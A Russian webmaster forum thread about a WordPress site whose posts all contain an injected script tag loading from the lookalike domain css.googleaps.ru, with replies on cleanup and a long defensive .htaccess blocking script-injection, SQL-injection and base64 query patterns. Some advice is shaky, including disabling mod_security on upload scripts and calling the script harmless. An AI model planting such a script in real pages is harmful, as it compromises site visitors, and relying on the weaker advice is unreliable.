bozon

Нужна помощь в решении проблемы

15 posts in this topic

Подскажите что это за фигня такая, сегодня при редактировании текстов обнаружил что в КАЖДОЙ записи присутствует такой код <script src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script> проверка на вирусы ничего не дала, погуглил этот скрипт, вижу у многих такая проблема возникала, но толком никто не сказал что это за скрипт и как от него избавиться. Может кто-то из форумчан знает?

 

Сегодня неожиданно обнаружил, что часть записей пропала с сайта, сделал бекап, записи восстановил и вновь почистил БД от этого скрипта, и сного записи пропали, тут явная связь, может не стоит удалять этот скрипт, хотя везде говорят что этот скрипт вредоносный, хоть и не говорят какой именно веред он несет. Может кто сталкивался с этим, как решить этоту проблему. Сайт на WP.

Если тема создана в неподходящем разделе, прошу модераторов перенести в нужный раздел(не нашел на форуме раздела об уязвимостях)

Заранее спасибо.

Share this post


Link to post
Share on other sites

ну вообще код похож на вызов шрифтов гугла, только как то прописан странно, не, это не вирус

Share this post


Link to post
Share on other sites

jms.in.ua/blog/52-udalyaem-vredonosnyj-kod-iz-wordpress

Использовал рекомендации с этого сайта еще вчера, а сегодня пропала часть статей с сайта))) 

Share this post


Link to post
Share on other sites

Использовал рекомендации с этого сайта еще вчера, а сегодня пропала часть статей с сайта))) 

План действий:

1. Поменять пароли на хостинг, на FTP.

2. Восстановить бекап, поменять пароль на админку.

3. Поставить плагины защиты:

vituson.ru/pochemu-vozrosla-nagruzka-na-server

vituson.ru/nabor-plaginov-wordpress-dlya-zashhity-ot-xakerov

4. Удалить из записей бяку.

Share this post


Link to post
Share on other sites

Плагины для защиты WP, которые ставлю на все свои сайты:

 

Acunetix WP Security

Anti-XSS attack

belavir (php MD5)

Disable XML-RPC Pingback

Wordpress Firewall 2

 

"Плюс" закрываю админку по IP и редактирую файл htaccess:

 

Содержание для файла .htaccess с блокировкой всякой дряни:

 

 

 

Options +FollowSymLinks -Indexes

<IfModule mod_headers.c>
  Header always append X-Frame-Options SAMEORIGIN
</IfModule>

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{query_string} concat.*\( [NC,OR]
RewriteCond %{query_string} union.*select.*\( [NC,OR]
RewriteCond %{query_string} union.*all.*select [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteCond %{REQUEST_URI} !^/index\.php
RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule .* index.php [L]

<IfModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html text/plain text/xml application/xml application/xhtml+xml text/javascript text/css application/x-javascript
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4.0[678] no-gzip
BrowserMatch bMSIE !no-gzip !gzip-only-text/html
<ifmodule mod_gzip.c>
mod_gzip_on Yes
mod_gzip_item_include file \.js$
mod_gzip_item_include file \.css$ </ifmodule>
</IfModule>

RewriteEngine on
RewriteCond %{HTTP_REFERER} semalt\.com [NC,OR]
RewriteCond %{HTTP_REFERER} success-seo\.com [NC,OR]
RewriteCond %{HTTP_REFERER} best-seo-solution\.com [NC,OR]
RewriteCond %{HTTP_REFERER} buttons-for-website\.com [NC,OR]
RewriteCond %{HTTP_REFERER} buttons-for-your-website\.com [NC,OR]
RewriteCond %{HTTP_REFERER} best-seo-offer\.com [NC,OR]
RewriteCond %{HTTP_REFERER} rankings-analytics\.com [NC,OR]
RewriteCond %{HTTP_USER_AGENT} .*MJ12bot.* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Java [OR]
RewriteCond %{HTTP_USER_AGENT} NjuiceBot [OR]
RewriteCond %{HTTP_USER_AGENT} Gigabot [OR]
RewriteCond %{HTTP_USER_AGENT} Baiduspider [OR]
RewriteCond %{HTTP_USER_AGENT} JS-Kit [OR]
RewriteCond %{HTTP_USER_AGENT} Voyager [OR]
RewriteCond %{HTTP_USER_AGENT} PostRank [OR]
RewriteCond %{HTTP_USER_AGENT} PycURL [OR]
RewriteCond %{HTTP_USER_AGENT} Aport [OR]
RewriteCond %{HTTP_USER_AGENT} DotBot [OR]
RewriteCond %{HTTP_USER_AGENT} SurveyBot [OR]
RewriteCond %{HTTP_USER_AGENT} larbin [OR]
RewriteCond %{HTTP_USER_AGENT} Butterfly [OR]
RewriteCond %{HTTP_USER_AGENT} libwww [OR]
RewriteCond %{HTTP_USER_AGENT} Wget [OR]
RewriteCond %{HTTP_USER_AGENT} SWeb [OR]
RewriteCond %{HTTP_USER_AGENT} LinkExchanger [OR]
RewriteCond %{HTTP_USER_AGENT} Soup [OR]
RewriteCond %{HTTP_USER_AGENT} WordPress [OR]
RewriteCond %{HTTP_USER_AGENT} spbot [OR]
RewriteCond %{HTTP_USER_AGENT} MLBot [OR]
RewriteCond %{HTTP_USER_AGENT} InternetSeer [OR]
RewriteCond %{HTTP_USER_AGENT} FairShare [OR]
RewriteCond %{HTTP_USER_AGENT} Yeti [OR]
RewriteCond %{HTTP_USER_AGENT} Birubot [OR]
RewriteCond %{HTTP_USER_AGENT} YottosBot [OR]
RewriteCond %{HTTP_USER_AGENT} gold\ crawler [OR]
RewriteCond %{HTTP_USER_AGENT} Linguee [OR]
RewriteCond %{HTTP_USER_AGENT} Ezooms [OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [OR]
RewriteCond %{HTTP_USER_AGENT} Purebot [OR]
RewriteCond %{HTTP_USER_AGENT} User-Agent [OR]
RewriteCond %{HTTP_USER_AGENT} kmSearchBot [OR]
RewriteCond %{HTTP_USER_AGENT} SiteBot [OR]
RewriteCond %{HTTP_USER_AGENT} CamontSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ptd-crawler [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [OR]
RewriteCond %{HTTP_USER_AGENT} suggybot [OR]
RewriteCond %{HTTP_USER_AGENT} ttCrawler [OR]
RewriteCond %{HTTP_USER_AGENT} Nutch [OR]
RewriteCond %{HTTP_USER_AGENT} msnbot [OR]
RewriteCond %{HTTP_USER_AGENT} msnbot-media [OR]
RewriteCond %{HTTP_USER_AGENT} Slurp [OR]
RewriteCond %{HTTP_USER_AGENT} Zeus
RewriteRule ^(.*)$ – [F,L]

<Files xmlrpc.php>
    Order Deny,Allow
    Deny from all
</Files>

<files .htaccess>
order allow,deny
deny from all
</files>

<files wp-config.php>
order allow,deny
deny from all
</files>

SetEnvIf user-agent "Indy Library" stayout=1
SetEnvIf user-agent "libwww-perl" stayout=1
SetEnvIf user-agent "Wget" stayout=1
deny from env=stayout

<IfModule mod_headers.c>
<FilesMatch "\.(js|css|xml|gz)$">
Header append Vary: Accept-Encoding
</FilesMatch>
</IfModule>

<IfModule mod_security.c>
<Files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</Files>
</IfModule>
<IfModule mod_security.c>
<Files upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</Files>
</IfModule>

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

Share this post


Link to post
Share on other sites

План действий:

1. Поменять пароли на хостинг, на FTP.

2. Восстановить бекап, поменять пароль на админку.

3. Поставить плагины защиты:

vituson.ru/pochemu-vozrosla-nagruzka-na-server

vituson.ru/nabor-plaginov-wordpress-dlya-zashhity-ot-xakerov

4. Удалить из записей бяку.

Пароли менял и на админ панель сайта, на админку хостинга, и на фтп, и бекап делал, и бяку чистил сначало вручную, потом надоело, вычистил из БД, а сегодня обнаружил что части статей на сайте нет( даже само количество статей, в "опубликованных" меньше, сделал бекап, статьи вернулись, вычистил бяку еще раз, статьи пропали. Вот сейчас думаю что делать дальше, по-любому бекап, но сначало нужно решить вопрос со скриптом, что это за байда такая? если действительно безобидная вещь, вроде вывода шрифтов гугла, как считают некоторые, то и хрен с ней, а если что-то серьезное, надо сначало с этим разобраться. Писал хостеру, он пишет что сам не в курсе и всю инфу по этому скрипту сам искал в инете.(реальный ответ хостера. SPRINTHOSTкстати)

Share this post


Link to post
Share on other sites

ну вообще код похож на вызов шрифтов гугла, только как то прописан странно, не, это не вирус

в том то и дело, что похож, это как раз таки очень похоже на вирус, смотрим домен css.googleaps.ru , хоть раз такой видели у гугла ?

Share this post


Link to post
Share on other sites

хотел попробовать открыть этот подозрительный сайт, отдает ошибку 403

Share this post


Link to post
Share on other sites

Пароли менял и на админ панель сайта, на админку хостинга, и на фтп, и бекап делал, и бяку чистил сначало вручную, потом надоело, вычистил из БД, а сегодня обнаружил что части статей на сайте нет( даже само количество статей, в "опубликованных" меньше, сделал бекап, статьи вернулись, вычистил бяку еще раз, статьи пропали. Вот сейчас думаю что делать дальше, по-любому бекап, но сначало нужно решить вопрос со скриптом, что это за байда такая? если действительно безобидная вещь, вроде вывода шрифтов гугла, как считают некоторые, то и хрен с ней, а если что-то серьезное, надо сначало с этим разобраться. Писал хостеру, он пишет что сам не в курсе и всю инфу по этому скрипту сам искал в инете.(реальный ответ хостера. SPRINTHOSTкстати)

анализируйте access и error логи по вашему сайту, смотрите через какие файлы получили доступ, возможно где-то не правильно выставлены права

Share this post


Link to post
Share on other sites

анализируйте access и error логи по вашему сайту, смотрите через какие файлы получили доступ, возможно где-то не правильно выставлены права

По этому поводу хостер говорит что этот скрипт проник через уязвимость в WP версии ранее 4.2.1(в 4.2.1. дыру закрыли, у меня стоит версия 4.6.1)

Share this post


Link to post
Share on other sites

Погуглил еще немного и нашел вот что levelit(.точка.)ru/zapis-razgovora-asterisk/ понятия не имею как это могло попасть на сайт.

Share this post


Link to post
Share on other sites

Как по мне, так это похоже на ссылку на загрузку внешнего шрифта.

А вирусы скорее всего появляются от использования варезных шаблонов и компонентов (хотя может в вашем случае это не так)

Share this post


Link to post
Share on other sites

Как по мне, так это похоже на ссылку на загрузку внешнего шрифта.

А вирусы скорее всего появляются от использования варезных шаблонов и компонентов (хотя может в вашем случае это не так)

Фиг его знает что это такое, особых проблем он не доставлял, с помощью хостера удалил эту фигню из БД, подожду недельку посмотрим что получиться, пока что единственным положительным эффектом стало небольшое увеличение скорости загрузки страниц.

Share this post


Link to post
Share on other sites

В случае заражения WP мы делаем так:

1. Меняем все пароли (панель хостинга, FTP, БД, админка) на сложные

2. Сносим весь WP за исключением папки wp-content и файла wp-config

3. Распаковываем скачанную с оф. сайта последнюю версию WP, предварительно удалив из дистрибутива папку wp-content

4. Меняем путь к админке (можно нагуглить, как)

5. Прогоняем проверку с помощью скрипта ai-bolit в режиме "параноидальный"

Так же добавлю, что уязвимости в ВП в основном своем со стороны плагинов. Практически всегда это плагин от каких-то непонятных деятелей.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.